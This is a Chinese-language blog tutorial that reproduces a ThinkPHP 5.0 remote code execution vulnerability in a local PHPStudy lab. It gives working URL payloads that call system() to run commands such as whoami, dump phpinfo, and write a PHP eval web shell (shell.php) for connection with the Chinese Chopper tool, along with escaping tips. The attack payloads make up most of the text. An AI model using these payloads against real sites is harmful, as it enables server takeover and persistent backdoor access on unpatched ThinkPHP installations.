溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行

發(fā)布時(shí)間:2021-10-18 16:02:32 來(lái)源:億速云 閱讀:188 作者:柒染 欄目:安全技術(shù)

本篇文章給大家分享的是有關(guān)如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行,小編覺得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說(shuō),跟著小編一起來(lái)看看吧。

ThinkPHP是一款國(guó)內(nèi)流行的開源PHP框架,某些版本可能存在遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可向緩存文件內(nèi)寫入PHP代碼,導(dǎo)致遠(yuǎn)程代碼執(zhí)行。雖然該漏洞利用需要有幾個(gè)前提條件,但鑒于國(guó)內(nèi)使用ThinkPHP框架的站點(diǎn)數(shù)量之多,該漏洞還是存在一定的影響范圍.

受影響的版本包括5.05.1

下載ThinkPHP5.0.22版本源碼程序,放在PHPStudy運(yùn)行目錄下并訪問(wèn)

如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行

1.將Payload添加進(jìn)入U(xiǎn)RL地址后面進(jìn)行利用

Payload1:system函數(shù)遠(yuǎn)程命令執(zhí)行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行

Payload2:phpinfo函數(shù)查看phpinfo()的信息

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行

2.利用Payload寫入shell,并使用菜刀進(jìn)行連接

Payload1:寫入shell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

**注意:**需要對(duì)特殊字符使用^轉(zhuǎn)義(cmd環(huán)境下轉(zhuǎn)義方式),windows環(huán)境的echo命令輸出字符串到文檔不用引號(hào)(單引號(hào)、雙引號(hào)),部分字符url編碼不編碼都行.

菜刀連接

如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行

以上就是如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行,小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI